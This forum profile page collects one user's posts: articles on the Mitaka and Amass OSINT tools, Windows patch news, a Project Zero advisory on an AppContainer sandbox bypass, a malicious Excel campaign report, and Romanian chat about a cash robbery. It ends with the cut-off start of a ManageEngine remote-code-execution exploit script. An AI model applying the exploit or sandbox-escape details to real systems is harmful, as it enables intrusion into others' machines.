Jump to content

Kev

Active Members
  • Posts

    1026
  • Joined

  • Days Won

    55

Everything posted by Kev

  1. Web browser extensions are one of the simplest ways to get starting using open-source intelligence tools because they're cross-platform. So anyone using Chrome on Linux, macOS, and Windows can use them all the same. The same goes for Firefox. One desktop browser add-on, in particular, makes OSINT as easy as right-clicking to search for hashes, email addresses, and URLs. Mitaka, created by Manabu Niseki, works in Google Chrome and Mozilla Firefox. Once installed, it lets you select and inspect certain pieces of text and indicators of compromise (IoC), running them through a variety of different search engines, all with just a few clicks. The tool can help investigators identify malware, determine the credibility of an email address, and see if a URL is associated with anything sketchy, to name just a few things. Installing Mitaka in Your Browser If you've ever installed a browser extension before, you know what to do. Even if not, it couldn't be easier. Just visit Mitaka in either the Chrome Web Store or Firefox Add-Ons, hit "Add to Chrome" or "Add to Firefox," then select "Add" to verify. Mitaka: Chrome Extension | Firefox Add-On Then, once you've found something of interest on a website or in an email that you're investigating, all you need to do is highlight and right-click it, then look through all of the options Mitaka provides in the contextual menu. On the GitHub page for Mitaka, there are a few examples worth trying out to see how well Mitake works. Example 1 Inspecting Email Addresses Whenever you see an email address that you suspect is malicious, whether it's defanged (obfuscated so it can't be clicked) or clickable, you can highlight it, right-click it, then choose "Mitaka." If it's defanged, which usually means putting in [.] where regular periods go to break up the link, Mitaka will rearm it so that any search you perform will still work. In the Mitaka menu, you'll see a variety of tools you can use to inspect and investigate the email address. There are searches you can perform on Censys, PublicWWW, DomainBigData, DomainWatch, EmailRep, IntelligenceX, OCCPR, RiskIQ, SecurityTrails, ThreatConnect, ThreatCrowd, and ViewDNS. For example, if you want to learn its email reputation, choose "Search this email on EmailRep." From the results, we can see that test@example.com is probably not one we should trust. In fact, we can see from this report that it's been blacklisted and flagged for malicious activity. So, if we were to find or receive an email address that had been flagged this way, we would be able to very quickly determine that it was associated with somebody who was blacklisted for malware, or possibly something like phishing, and that would be an excellent way to identify a risky sender or user. Conversely, let's say we're looking through a breach of different people's passwords, and we want to identify whether or not a real person owns an email address. We can take a properly formed email address, right-click it, select "Mitaka," then use the same EmailRep tool to check. From a report, we can assume that it's probably a real person because the email address has been seen in 27 reputable sources on the internet, including Vimeo, Pinterest, and Aboutme. In the code, we can see all of the information about the different types of high-quality profiles that are linked to the email address, which further legitimizes the account as real. Example 2 Performing Malware Analysis on Files Malware analysis is another exciting tool in Mitaka's arsenal. Let's say that we're on a website, and we have a file that we want to download. We've heard of the tool before, it looks reputable, and the web app seems good. Once we download the file, we can compare the hash to the one listed on the site. If the hash matches, we know we downloaded the file the site's author intended, but how do we know that the file is really OK? If a virus scanner doesn't catch it on the computer, you can always take the hash of the file that's on the website, right-click it, choose "Mitaka," then use something like VirusTotal. This scanner can identify potentially suspicious files by looking at the hash and trying to find out whether or not it could harm your computer. In our case, we can see that there are multiple detections and that this is a macOS crypto miner. So if we had run this on our computer, even though it's undetected by Avast and a bunch of other different, pretty reputable malware scanners, it still would have gotten through. So, as you can see, Mitaka is a pretty effective way of checking to see if a file you encounter on the web has been flagged for doing something bad using tools like VirusTotal or another data source. Available from the menu for this kind of search is Censys, PublicWWW, ANY.RUN, Apklab, Hashdd, HybridAnalysis, InQuest, Intezer, JoeSandbox, MalShare, Maltiverse, MalwareBazaar, Malwares, OpenTIP, OTX, Pulsedive, Scumware, ThreatMiner, VirusTotal, VMRay, VxCube, and X-Force-Exchange. Example 3 Checking to See if a Site Is Sketchy Now, we can also do URL searches with Mitaka. If we're looking at a big data dump, or if we just want to see if a particular URL on a webpage or email has been identified with something sketchy, we can right-click the link, choose "Mitaka," then select from one of the tools. Available tools for this kind of search include Censys, PublicWWW, BinaryEdge, crt.sh, DNSlytics, DomainBigData, DomainTools, DomainWatch, FOFA, GoogleSafeBrowsing, GreyNoise, Hashdd, HurricaneElectric, HybridAnalysis, IntelligenceX, Maltiverse, OTX, Pulsedive, RiskIQ, Robtex, Scumware, SecurityTrails, Shodan, SpyOnWeb, Spyse, Talos, ThreatConnect, ThreatCrowd, ThreatMiner, TIP, URLhaus, Urlscan, ViewDNS, VirusTotal, VxCube, WebAnalyzer, and X-Force-Exchange. For our test, let's just check on Censys. In our case, the domain we searched is associated with some pretty sketchy stuff. Because we can see that it's being used for poor lookups and all sorts of other worrisome activities, we can assume that it's probably not a domain that's owned by a corporation or company that is more straightforward with its dealings. This is just someone looking to make as much money as they can off of the web space that they have. We can also see that it uses an Amazon system, which means that it's probably just a rented system and not actually someone's physical setup. All of this data points to the fact that this would be a very sketchy website to do business with and may not be as legitimate as you'd like. There's a Lot More to Explore! Those were all pretty basic use-cases, but as you can see, there are a ton of different ways we can investigate a clue on the internet using a simple right-click menu. One thing that is really cool about Mitaka is that it's able to detect different types of data so that the contextual search options can cater to the right information. This was just a quick overview. If you want to get started with Mitaka, you should go through all the different data types, highlight something on a website or email, then right-click and choose your Mitaka search. There is a lot of available sources, and it can be overwhelming at first, but that just means Mitaka is a valuable tool with tons of helpful searches available at the tip of your finger. Source
  2. Throughout history, human beings have crafted tools as a way to improve people’s lives. From stone hammers to metal knives, through advancements from rudimentary medical instruments to breakthroughs made with industrial steam machinery. From the disruption of transistors and the computer era through today’s technology that seems to come straight out of science fiction, like the storage of data in DNA, tools at the very least allow us to get more work done. Tools afford us time and efficiency, and the security industry is no exception. Security tools are like what optical illusion is for magicians: they yield impressive results in brief periods of time, with a great impact on your audience. These digital instruments open multiple doors to a world of information that would otherwise be difficult to perceive. Today we’re introducing you to Amass, a true information-gathering ‘swiss army knife’ for your command line tool box. It was originally written by Jeff Foley (currently the Amass Project Leader) and later adopted by the OWASP Foundation. What is Amass? Amass is an open source network mapping and attack surface discovery tool that uses information gathering and other techniques such as active reconnaissance and external asset discovery to scrap all the available data. In order to accomplish this, it uses its own internal machinery and it also integrates smoothly with different external services to increase its results, efficiency and power. This tool maintains a strong focus on DNS, HTTP and SSL/TLS data discovering and scrapping. To do this, it has its own techniques and provides several integrations with different API services like (spoiler alert!) the SecurityTrails API. It also uses different web archiving engines to scrape the bottom of the internet’s forgotten data deposits. Installation Let’s start by installing this tool in our local environment. While it supports multiple software platforms, more interestingly, it supports different hardware architectures, which means that you could build your own automated box using a small but powerful ARM board—Raspberry PI for instance, or even a mobile phone! Today our focus is to work on a 64-bit PC with Linux, but if you want to test it first and install it later, we strongly suggest you try out the docker image. To install it from a pre-compiled binary, go to the releases section of their Github page. You can access it here, and a screenshot of available zip packages as well as the source code is shown below: It’s very important (especially when using security tools) that you check the integrity of those downloaded binaries to be sure there has been no tampering whatsoever between what you intended to download and what you actually ended up downloading onto your hard drive. To do that, you need to save the file amass_checksums.txt, which includes all the hash checksums corresponding to the binaries required to verify the authenticity of the OS binaries. For the Amass 3.5.2 version (the latest release available at the time of this writing) the checksum file has the following contents: As in this analysis we’re using Linux in an amd64 CPU architecture, we are only verifying this hash (you can avoid this if you want, but the check will output several “No such file…” errors). To do so, we must first remove all non-corresponding hashes from the file, and invoke the following command: $ shasum -c amass_checksums.txt amass_v3.5.2_linux_amd64.zip: OK With that result, we can be assured that the binary is correct, and that there were no file modifications while it was downloading. Simply fetch the desired .zip file (in our case that would be amass_v3.5.3_linux_amd64.zip), uncompress it and enter the newly created folder (amass_v3.5.3_linux_amd64). In it you will see different files and folders, the executable is called “amass”, and when you run it, you’ll see this: This would be the end of the installation, but if you want it to be part of your $PATH, just move the amass binary to your favourite executables folder. First steps Let’s take a look at the subcommands so we can check out the power of this tool: Subcommands: amass intel - Discover targets for enumerations amass enum - Perform enumerations and network mapping amass viz - Visualize enumeration results amass track - Track differences between enumerations amass db - Manipulate the Amass graph database amass dns - Resolve DNS names at high performance We are going to explain briefly what they do and how to activate them, and note a few of them while trying to dig a little deeper than the ones mentioned in the official tutorial or user guide, for both fun and educational purposes! Presentation by obfuscation One particular object within the intel subcommands is the “-demo” flag, which allows us to output results in an obfuscated manner. This way, we can make presentations without revealing too much information about our targets. In this example we are conducting an intelligence gathering action and obtaining an obfuscated output with the use of the -demo flag in the command line. This will replace TLDs and ccTLDs with ‘x’ characters: $ amass intel -asn 6057 -demo adsl.xxxxxxxxx.xxx.xx ancel.xxx.xx ir-static.xxxxxxxxx.xxx.xx algorta.xxx.xx estudiocontable.xxx.xx fielex.xxx.xx ain.xxx.xx vyt.xxx.xx com.xx cx2sa.xxx easymail.xxx.xx mor-inv.xxx catafrey.xxx kernel.xxx.xx bglasesores.xxx sislersa.xxx arpel.xxx.xx copab.xxx.xx spefar.xxx aitacargas.xx duprana.xx sua.xxx.xx gruporovira.xxx exterior.xxxxx.xxx lideco.xxx seaairforwarders.xxx flp.xx acac.xxx.xx cerrolargo.xxx.xx esquemas.xxx Autonomous system number inquiry Autonomous systems are the true guardians of internet communications. They know exactly how your traffic can reach a certain destination by receiving and advertising routing information. If this sounds at all interesting, let us tell you, it is. Let’s dive in a little more, in detail. Every organization connected to the internet with IP ranges to advertise, or that want multihomed broadband connections (for example, “I’m a cloud provider, and want to advertise my own delegated IP range to two different ISPs”), should have an autonomous system (AS for short). An autonomous system number (abbreviated as ASN) is the ID number of this AS given by your region’s NIC authority (you can find more information on this topic in our previous article about ASN Lookup). So what could you possibly do with this command? For one thing, you could dig up all the domain names associated within an entire ASN—that means a complete cloud provider (e.g., Google or Microsoft have their own ASN), an entire mega company (Apple, Akamai and Cloudflare also have their own ASNs), or an entire ISP (internet service providers of all sizes have ASNs, even the medium-sized and smaller ones). Internet exchanges and regional internet registries (IXs and RIRs, respectively) also have associated AS Numbers. So how can we perform an ASN check? Once you have your target’s ASN you can find out what’s in there, as in the following example: $ amass intel -asn 28000 labs.lacnic.net lacnic.net.uy lactld.org dev.lacnic.net lacnic.net lacnog.org net.uy lacnog.lat ripe.net Here we have just queried the LACNIC (Latin American and Caribbean RIR) ASN; now we’ll try with the RIPE (Europe, Middle East and Central Asia RIR) ASN: $ amass intel -asn 25152 root-servers.net Despite the few results, those domains (especially the last one, corresponding to RIPE’s ASN) are some of the most important names on the internet (check out our piece on DNS Root Servers). Great! What else can we do with this tool? Let’s find AS Numbers by way of description. This is incredibly useful, as you can get records quickly and avoid gathering data manually, by looking at companies’ websites, looking glass tools, and more. By following the previous example, we’ll be looking at some of the AS Numbers regarding other existing RIRs (hint: ARIN corresponds to North America, AFRINIC to Africa and APNIC services to Pacific Facing Asia and Oceania): ARIN Results $ amass intel -org ARIN 3856, PCH-AS - Packet Clearing House 3914, KMHP-AS-ARIN - Keystone Mercy Health Plan 4441, MARFORPACDJOSS - Marine Forces Pacific 6656, STARINTERNET 6702, APEXNCC-AS Gagarina avenue 6942, CLARINET - ClariNet Communications Corporation 7081, CARIN-AS-BLOCK - ISI 7082, CARIN-AS-BLOCK - ISI 7083, CARIN-AS-BLOCK - ISI 7084, CARIN-AS-BLOCK - ISI 7085, CARIN-AS-BLOCK - ISI 9489, KARINET-AS Korea Aerospace Research Institute 10034, GARAK-AS-KR SEOUL AGRICULTURAL & MARINE PRODUCTS CORP. 10056, HDMF-AS Hyundai Marin & Fire Insurance 10065, KMTC-AS-KR Korea Marine Transport 10309, MARIN-MIDAS - County of Marin 10439, CARINET - CariNet 10715, Universidade Federal de Santa Catarina 10745, ARIN-ASH-CHA - ARIN Operations 10927, PCH-SD-NAP - Packet Clearing House 11179, ARYAKA-ARIN - Aryaka Networks 11187, GWS-ARIN-AS - Global Web Solutions 11228, ARINC - ARINC 11242, Universidade Federal de Santa Catarina AFRINIC Results $ amass intel -org AFRINIC 33764, AFRINIC-ZA-JNB-AS 37177, AFRINIC-ANYCAST 37181, AFRINIC-Anycast-RFC-5855 37301, AFRINIC-ZA-CPT-AS 37708, AFRINIC-MAIN 131261, AFRINIC-AS-AP Temporary assignment due to software testing APNIC Results $ amass intel -org APNIC 4608, APNIC-SERVICES Asia Pacific Network Information Centre 4777, APNIC-NSPIXP2-AS Asia Pacific Network Information Centre 9450, WEBEXAPNIC-AS-AP Webex Communications Inc 9838, APNIC-DEBOGON-AS-AP APNIC Debogon Project 17821, APNICTRAINING-ISP ASN for APNICTRAINING LAB ISP 18366, APNIC-ANYCAST-AP ANYCAST AS 18367, APNIC-UNI1-AP UNICAST AS of ANYCAST node(Hongkong) 18368, APNIC-SERVICES APNIC DNS Anycast 18369, APNIC-ANYCAST2 APNIC ANYCAST 18370, APNIC-UNI4-AP UNICAST AS of ANYCAST node(Other location) 23659, HEITECH-AS-AP APNIC HEITECH ASN 24021, APNICRANDNET-TUI-AU TUI experiment 24555, APRICOT-APNIC-ASN ASN used for conferences in AP region 38271, CSSL-APNIC-2008-IN CyberTech House 38610, APNIC-JP-RD APNIC R&D Centre 38905, CPHAPNIC-AS-AP Consolidated Press Holdings Limited 45163, APNICRANDNET-TUI2-AU TUI experiment 45192, APNICTRAINING-DC ASN for APNICTRAINING LAB DC 55420, SABAHNET-AS-AP APNIC ASN Block This set of outputs shows us which AS Numbers have a description matching our search criteria, which is extremely useful and fast! Other intel capabilities may include: Reverse WHOIS queries Active reconnaissance On this topic, we could say that the flag -active gives a proactive check against additional sources of information, checks what active SSL/TLS Certificates this server has and provides us with additional information (enabling the -src flag allows us to see which source of information was queried as well as the corresponding result). $ amass intel -addr 8.8.8.8 -src [Reverse DNS] dns.google $ amass intel -active -addr 8.8.8.8 -src[Reverse DNS] dns.google [Active Cert] dns.google.com [Active Cert] 8888.google The intel subcommand provides different ways to output information, and to make further checks like port scanning, you can take a look at more details in the github documentation page. Reconnaissance How about plain and simple DNS record enumeration? Amass provides this using the enum subcommand, and it queries multiple different sources of information to check the existence of domain related subdomains. In the image below you can see the different backends this tool relies on to find information. Some of them are quite peculiar, as in the case of the Pastebin website check. Now here’s an example of how adding an ASN to the query can obtain additional information. In the first query we explicitly added the AS Number, and for the second query it was removed. The results speak for themselves: $ amass enum -asn 28000 -d lacnic.net $ amass enum -d lacnic.net To summarize, adding a context (e.g., ASN) could help with getting more information from your query. Scraping unpublished subdomains Sometimes subdomains won’t show up. They can be a bit inactive, and when queried, their activity goes far below the radar. So how do we get them? Meet subdomain brute forcing. This technique allows us to bring in our custom wordlist and try it against the configured domain name, in an attempt to find or discover unseen subdomains. In this case, we are going to guess… $ amass enum -brute -src -d ripe.net -demo The output will look similar to this: Tracking Is there anything really static on the internet? Well, there are no simple answers to this question. The volatility that DNS records, BGP routes, and IP space have on the internet is astonishing. In this scenario, we will use the track subcommand, to see exactly what has changed between our previous checks. The results may surprise you: Apparently, in a window of roughly six hours, two subdomains’ AAAA records were removed. The track subcommand allows us to match information between checks and output the difference between them, so you can get an idea of how quickly a target is moving. For more detail, you can add the -history flag, and this will output different time frames and activity. The following example accounts for the -history flag, so you can see how the output will look: Wait, there’s data storage too? The short answer is yes. Amass implements a graph database that can be queried after every check to see which records have been modified, and to speed up query results. The following command will give us a summary on the data we’ve collected, showing the sources of information ordered by ASN and IP range in conjunction with a list of the domains and subdomains discovered. $ amass db -show To perform further data analysis, it’s helpful to get a unique identification number that will let you trace the different checks you have made (it helps when trying to filter and visualize data later). To get this ID you’ll need to run the following: Then, if desired, you can get a summary—or the full output—regarding the investigation. For the sake of brevity, let’s just do a summary output of index number 1 corresponding to the ripe.net analysis: Visualization If you’ve come this far, you probably have an overall idea of the power of this tool, and you’re probably plenty excited about the data outputs and the colourful shell results as well! But what if you want to extract these findings and take them to the next level? Perhaps you want to be able to show your target ecosystem, and make a nice presentation of it. If that’s the case, then Amass has you covered. Let’s meet the viz subcommand. That image you see below could be one of the possible outputs. To gain some insight, the small red dot at the center corresponds to the ripe.net domain, and the satellites connected to it are different objects that represent associated data such as IP addresses, DNS records, etc. You can zoom in to see what all this is composed of, namely: Red dots - domain names Green dots - subdomain names Yellow dots - reverse pointer records Orange dots - IP addresses (v4 & v6) Purple dots - mail exchanger records (MX) Cyan dots - nameserver records (NS) Blue dots - autonomous system numbers (ASNs) Pink dots - IP netblocks As you zoom in on this example, your visualization would look like the one below: And if you want to look at (almost) the whole ecosystem, you can zoom out to see the “big picture”. You can make your own visualization, focused on a specific analysis. Now we are taking the index identification number (8) obtained in the previous section and opening the output file that we need to visualize: $ amass viz -enum 8 -d3 The animated visualization HTML file will look similar to this: What about API integrations? While it may seem like this tool has no need for configuration files, that’s not entirely true. When an API interaction is needed, you need to conveniently save your keys so you can use this feature recurrently. To do that, we are going to set up an Amass configuration file, with the necessary information for the APIs to work, and throw down some commands to see how the tool behaves. We can start by downloading an example should be “configuration file from this link. Config file locations should be placed like those stated in the following table depending on your deployment: You can also place a different config file for testing purposes, if you set the -config flag. When it comes to enabling an API key, it’s pretty straightforward. Just uncomment the desired API section and place your SecurityTrails-provided API key: [SecurityTrails] apikey = YOUR_API_KEY Then, simply invoke the desired command, using the config file with the API key in it, in our case: We can see that the SecurityTrails API integration is enabled, now let’s see if we can get any results by using it: Great! You’ve just learned how to enable an API key and execute a query using it. If you need more information, just look into the config file for more useful data about integrations and third-party services. Summary While this tool is an amazing resource for finding data about any target, it’s somewhat vague in its documentation and how it actually works. Of course, you’re probably thinking, “Why do I need to know how they do it?”, but understanding how it gathers data according to a determined method makes it easier to determine how accurate the result is. You could be obtaining a domain associated to a determined ASN that bears no logical relation at first sight without a proper explanation, but is still listed. If you search in the most common places, such as in WHOIS, DNS A MX TXT or reverse pointer (rDNS or PTR) records, etc., you won’t easily find a good reason for its appearance within the output. Of course, if you’re familiar with Golang, you can read first-hand how it’s been created, and yes the -src flag can shed light on where data is pulled from, but if you’re not up for a source code review, a little more in the way of in-depth documentation (explaining how every check works) would be really nice. All in all, know this: Amass should definitely be included in your security toolbox. Source
  3. Stiu, am prieteni cu magazine care ruleaza cel putin 20.000 ron zilnic, conteaza provenienta lor si seriile, bancile de obicei le sorteaza pe serii, in caz de sunt serii repetitive si murdare se poate afla usor Edit/ asta in cazul in care nu este ceva putred la mijloc, au fost cazuri cand proprietarii de amanet s-au jefuit singuri pt. asigurare Edit// sunt camere video (CCTV) pe fiecare trecere de pietoni,probabil seful de posta manca gogosi, sigur si-au dat jos mastile cand au plecat, s-au schimbat de haine etc
  4. Kev

    DarkWeb

    era 404 cand Marcus Hutchins a fost inchis, avea profil acolo, dar intr-un timp a fost "ascuns" Stiu ce inseamna helicopere
  5. Microsoft today released updates to remedy nearly 130 security vulnerabilities in its Windows operating system and supported software. None of the flaws are known to be currently under active exploitation, but 23 of them could be exploited by malware or malcontents to seize complete control of Windows computers with little or no help from users. The majority of the most dangerous or “critical” bugs deal with issues in Microsoft’s various Windows operating systems and its web browsers, Internet Explorer and Edge. September marks the seventh month in a row Microsoft has shipped fixes for more than 100 flaws in its products, and the fourth month in a row that it fixed more than 120. Among the chief concerns for enterprises this month is CVE-2020-16875, which involves a critical flaw in the email software Microsoft Exchange Server 2016 and 2019. An attacker could leverage the Exchange bug to run code of his choosing just by sending a booby-trapped email to a vulnerable Exchange server. Also not great for companies to have around is CVE-2020-1210, which is a remote code execution flaw in supported versions of Microsoft Sharepoint document management software that bad guys could attack by uploading a file to a vulnerable Sharepoint site. Security firm Tenable notes that this bug is reminiscent of CVE-2019-0604, another Sharepoint problem that’s been exploited for cybercriminal gains since April 2019. Microsoft fixed at least five other serious bugs in Sharepoint versions 2010 through 2019 that also could be used to compromise systems running this software. And because ransomware purveyors have a history of seizing upon Sharepoint flaws to wreak havoc inside enterprises, companies should definitely prioritize deployment of these fixes, says Alan Liska, senior security architect at Recorded Future. Todd Schell at Ivanti reminds us that Patch Tuesday isn’t just about Windows updates: Google has shipped a critical update for its Chrome browser that resolves at least five security flaws that are rated high severity. If you use Chrome and notice an icon featuring a small upward-facing arrow inside of a circle to the right of the address bar, it’s time to update. Completely closing out Chrome and restarting it should apply the pending updates. Once again, there are no security updates available today for Adobe’s Flash Player, although the company did ship a non-security software update for the browser plugin. The last time Flash got a security update was June 2020, which may suggest researchers and/or attackers have stopped looking for flaws in it. Adobe says it will retire the plugin at the end of this year, and Microsoft has said it plans to completely remove the program from all Microsoft browsers via Windows Update by then. Before you update with this month’s patch batch, please make sure you have backed up your system and/or important files. It’s not uncommon for Windows updates to hose one’s system or prevent it from booting properly, and some updates even have known to erase or corrupt files. So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide. As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Source
  6. incearca pe un device nou, posibil sa isi lase semnaturi prin DLL-uri pe undeva, daca nu functioneaza cu re-install Il instalezi, setezi aceeasi data, iar cand il repornesti setezi data in care l-ai instalat (off-line)
  7. Kev

    DarkWeb

    NU eram beat, intra daca poti e 404 hidden shell
  8. Dude, intelege, nu au ce sa fac0227 cu banii, sa presupunem ce a spus Pacalici, cum ca ar fi casetele sigilate, bun, dar banii de unde ies prin fantã? Au orificii pe unde se injecteaza "cerneala" in caz de bum Se leaga ai sa te confingi
  9. The StorageFolder class when used out of process can bypass security checks to read and write files not allowed to an AppContainer. advisory-info: Windows: StorageFolder Marshaled Object Access Check Bypass EoP Windows: StorageFolder Marshaled Object Access Check Bypass EoP Platform: Windows 10 2004/1909 Class: Elevation of Privilege Security Boundary: AppContainer Summary: The StorageFolder class when used out of process can bypass security checks to read and write files not allowed to an AppContainer. Description: When a StorageFolder object is passed between processes it's custom marshaled using the CStorageFolderProxy class (CLSID: a5183349-82de-4bfc-9c13-7d9dc578729c) in windows.storage.dll. The custom marshaled data contains three values, a standard marshaled OBJREF for a Proxy instance in the originating process, a standard marshaled OBJREF for the original CStorageFolder object and a Property Store. When the proxy is unmarshaled the CStorageFolderProxy object is created in the client process, this redirects any calls to the storage interfaces to the creating process's CStorageFolder instance. The CStorageFolder will check access based on the COM caller. However, something different happens if you call a method on the marshaled Proxy object. The call will be made to the original process's Proxy object, which will then call the real CStorageFolder method. The problem is the Proxy and the real object are running in different Apartments, the Proxy in the MTA and the real object in a STA. This results in the call to the real object being Cross-Apartment marshaled, this breaks the call context for the thread as it's not passed to the other apartment. As shown in a rough diagram. [ Client (Proxy::Call) ] => [Server [ MTA (Proxy::Call) ] => [ STA (Real::Call) ] ] As the call context is only captured by the real object this results in the real object thinking it's being called by the same process, not the AppContainer process. If the process hosting the StorageFolder is more privileged this can result in being able to read/write arbitrary files in specific directories. Note that CStorageFile is similarly affected, but I'm only describing CStorageFolder. In any case it's almost certainly the shared code which is a problem. I've no idea why the classes aren't using the FTM, perhaps they're not marked as Agile? If they were then the real object would be called directly and so would still be running in the original caller's context. Even if the FTM was enabled and the call context was maintained it's almost certainly possible to construct the proxy in a more privileged, but different process because of the asymmetric nature of the marshaling, invoke methods in that process which will always have to be performed out of process. Fixing wise, firstly I don't think the Proxy should ever end up standard marshaled to out of process callers, removing that might help. Also when a call is made to the real implementation perhaps you need to set a Proxy Blanket or enable dynamic cloaking and impersonate before the call. There does seem to be code to get the calling process handle as well, so maybe that also needs to be taken into consideration? This code looks like it's copied and pasted from SHCORE which is related to the bugs I've already reported. Perhaps the Proxy is not supposed to be passed back in the marshal code, but the copied code does that automatically? I'd highly recommend you look at any code which uses the same CFTMCrossProcClientImpl::_UnwrapStream code and verify they're all correct. Proof of Concept: I've provided a PoC as a C# project. The code creates an AppContainer process (using a temporary profile). It then uses the Partial Trust StorageFolderStaticsBrokered class, which is instantiated OOP inside a RuntimeBroker instance. The class allows opening a StorageFolder object to the AC profile's Temporary folder. The StorageFolderStaticsBrokered is granted access to any AC process as well as the \u"lpacAppExperience\u" capability which means it also works from Classic Edge LPAC. The PoC then uses the IStorageItem2::GetParentAsync method to walk up the directory hierarchy until it reaches %LOCALAPPDATA%. It can't go any higher than that as there seems to be some condition restriction in place, probably as it's the base location for package directories. The code then writes an arbitrary file abc.txt to the Microsoft sub-directory. Being able to read and write arbitrary files in the user's Local AppData is almost certainly enough to escape the sandbox but I've not put that much time into it. 1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work. 2) Run the POC executable. Expected Result: Accessing files outside of the AppContainers directory is blocked. Observed Result: An arbitrary file is written to the %LOCALAPPDATA%\\Microsoft directory. This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2020-09-23. Disclosure at an earlier date is also possible if agreed upon by all parties. Related CVE Numbers: CVE-2020-0886. Found by: forshaw@google.com Download: GS20200908185407.tgz (18 KB) Source
  10. ti ai gasit de maria si marian on e futere cu editorul scriu fara ascii
  11. Nytro pernutele acelea de Ariel despre care spuneam, contin un acid anume ce topesc unele elemente indiferent de euro dolari se observa clar la UV PS lirele sunt to de plastic
  12. "exista si la case mai mari" https://www.ecb.europa.eu/euro/banknotes/ink-stained/html/index.en.html
  13. Complex workflows Titanoboa is a platform for creating complex workflows on JVM. Due to its generic, distributed and easily extensible design, you can use it for wide variety of purposes: as a Service Bus (ESB) as a full-featured iPaaS / Integration Platform for Big Data processing for IT Automation for Batch Processing for Data Transformations / ETL Your workflow graph can be even cyclic! We don't care. In titanoboa workflows you can execute your steps sequentialy or in parallel. You can then join parallel threads back together whenever you wish to. Each step can be handled transactionally to make sure it really did run. If things go south you can let the step retry automatically. Or just catch errors and handle them as you wish... Screenshots: Download Trial Source
  14. Oricum nu au ce sa faca cu banii (daca sunt modele noi), la primul soc se sparg pernutele de ariel, se vor certa intre ei, se leaga singuri cretinii
  15. This includes all the source material for the 20 lessons of what was previously a commercial online Linux server admin course - now free for you to learn with! If you spot any typos or "dead links" simply raise a GitHub "issue" against this project. You are free to use this under the terms of the license, but copyright remains with the author. Steve Download: git clone https://github.com/snori74/linuxupskillchallenge.git Source
  16. They were still Excel documents. Just not your typical Excel files. Enough to trick some security systems, though. A newly discovered malware gang is using a clever trick to create malicious Excel files that have low detection rates and a higher chance of evading security systems. Discovered by security researchers from NVISO Labs, this malware gang — which they named Epic Manchego — has been active since June, targeting companies all over the world with phishing emails that carry a malicious Excel document. But NVISO said these weren't your standard Excel spreadsheets. The malicious Excel files were bypassing security scanners and had low detection rates. Malicious Excel files were compiled with EPPlus According to NVISO, this was because the documents weren't compiled in the standard Microsoft Office software, but with a .NET library called EPPlus. Developers typically use this library part of their applications to add "Export as Excel" or "Save as spreadsheet" functions. The library can be used to generate files in a wide variety of spreadsheet formats, and even supports Excel 2019. NVISO says the Epic Manchego gang appears to have used EPPlus to generate spreadsheet files in the Office Open XML (OOXML) format. The OOXML spreadsheet files generated by Epic Manchego lacked a section of compiled VBA code, specific to Excel documents compiled in Microsoft's proprietary Office software. Some antivirus products and email scanners specifically look for this portion of VBA code to search for possible signs of malicious Excel docs, which would explain why spreadsheets generated by the Epic Manchego gang had lower detection rates than other malicious Excel files. This blob of compiled VBA code is usually where an attacker's malicious code would be stored. However, this doesn't mean the files were clean. NVISO says that the Epic Manchego simply stored their malicious code in a custom VBA code format, which was also password-protected to prevent security systems and researchers from analyzing its content. Image: NVISO But despite using a different method to generate their malicious Excel documents, the EPPlus-based spreadsheet files still worked like any other Excel document. Active since June The malicious documents (also called maldocs) still contained a malicious macro script. If users who opened the Excel files allowed the script to execute (by clicking the "Enable editing" button), the macros would download and install malware on the victim's systems. The final payloads were classic infostealer trojans like Azorult, AgentTesla, Formbook, Matiex, and njRat, which would dump passwords from the user's browsers, emails, and FTP clients, and sent them to Epic Machengo's servers. While the decision to use EPPlus to generate their malicious Excel files might have had some benefits, in the beginning, it also ended up hurting Epic Manchego in the long run, as it allowed the NVISO team to very easily detect all their past operations by searching for odd-looking Excel documents. In the end, NVISO said it discovered more than 200 malicious Excel files linked to Epic Manchego, with the first one dating back to June 22, this year. Image: NVISO NVISO says this group appears to be experimenting with this technique, and since the first attacks, they have increased both their activity and the sophistication of their attacks, suggesting this might see broader use in the future. Nevertheless, NVISO researchers weren't totally surprised that malware groups are now using EPPlus. Indicators of compromise and a technical breakdown of the malicious EPPlus-rendered Excel files are available in NVISO Labs' Epic Manchego report. Via zdnet.com
  17. #!/usr/bin/python3 # Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated) # Google Dork: None # Date: 2020-09-04 # Exploit Author: Hodorsec # Vendor Homepage: https://manageengine.co.uk # Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html # Software Link: http://archives.manageengine.com/applications_manager/14720/ # Version: Until version 14720 # Tested on: version 12900 and version 14700 # CVE : CVE-2020-14008 # Summary: # POC for proving ability to execute malicious Java code in uploaded JAR file as an Oracle Weblogic library to connect to Weblogic servers # Exploits the newInstance() and loadClass() methods being used by the "WeblogicReference", when attempting a Credential Test for a new Monitor # When invoking the Credential Test, a call is being made to lookup a possibly existing "weblogic.jar" JAR file, using the "weblogic.jndi.Environment" class and method # Vulnerable code: # Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java # 129 /* */ public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception { # 130 /* 130 */ ClassLoader current = Thread.currentThread().getContextClassLoader(); # 131 /* */ try { # 132 /* 132 */ boolean setcredentials = false; # 133 /* 133 */ String url = "t3://" + hostname + ":" + portString; # 134 /* 134 */ JarLoader jarLoader = null; # 135 /* */ # ....<SNIP>.... # 143 /* */ } # 144 /* 144 */ else if (version == 8) # 145 /* */ { # 146 /* 146 */ if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists()) # 147 /* */ { # 148 /* */ # 149 /* 149 */ jarLoader = new JarLoader("." + File.separator + ".." + File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar"); # 150 /* */ # ....<SNIP>.... # 170 /* 170 */ Thread.currentThread().setContextClassLoader(jarLoader); # 171 /* 